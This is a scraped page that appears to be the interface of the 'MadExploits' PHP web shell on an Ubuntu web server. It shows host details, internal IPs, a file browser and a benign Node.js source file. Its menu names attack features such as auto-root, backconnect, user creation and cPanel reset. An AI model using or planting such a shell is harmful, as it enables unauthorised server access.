Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
got /
dist /
core /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
dns-ip-version.d.ts
290
B
-rw-r--r--
dns-ip-version.js
661
B
-rw-r--r--
get-body-size.d.ts
178
B
-rw-r--r--
get-body-size.js
959
B
-rw-r--r--
get-buffer.d.ts
125
B
-rw-r--r--
get-buffer.js
498
B
-rw-r--r--
is-form-data.d.ts
305
B
-rw-r--r--
is-form-data.js
222
B
-rw-r--r--
is-response-ok.d.ts
99
B
-rw-r--r--
is-response-ok.js
390
B
-rw-r--r--
options-to-url.d.ts
357
B
-rw-r--r--
options-to-url.js
1.68
KB
-rw-r--r--
proxy-events.d.ts
164
B
-rw-r--r--
proxy-events.js
442
B
-rw-r--r--
timed-out.d.ts
865
B
-rw-r--r--
timed-out.js
4.67
KB
-rw-r--r--
unhandle.d.ts
365
B
-rw-r--r--
unhandle.js
794
B
-rw-r--r--
url-to-options.d.ts
397
B
-rw-r--r--
url-to-options.js
810
B
-rw-r--r--
weakable-map.d.ts
223
B
-rw-r--r--
weakable-map.js
698
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get-body-size.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); const fs_1 = require("fs"); const util_1 = require("util"); const is_1 = require("@sindresorhus/is"); const is_form_data_1 = require("./is-form-data"); const statAsync = (0, util_1.promisify)(fs_1.stat); exports.default = async (body, headers) => { if (headers && 'content-length' in headers) { return Number(headers['content-length']); } if (!body) { return 0; } if (is_1.default.string(body)) { return Buffer.byteLength(body); } if (is_1.default.buffer(body)) { return body.length; } if ((0, is_form_data_1.default)(body)) { return (0, util_1.promisify)(body.getLength.bind(body))(); } if (body instanceof fs_1.ReadStream) { const { size } = await statAsync(body.path); if (size === 0) { return undefined; } return size; } return undefined; };
Close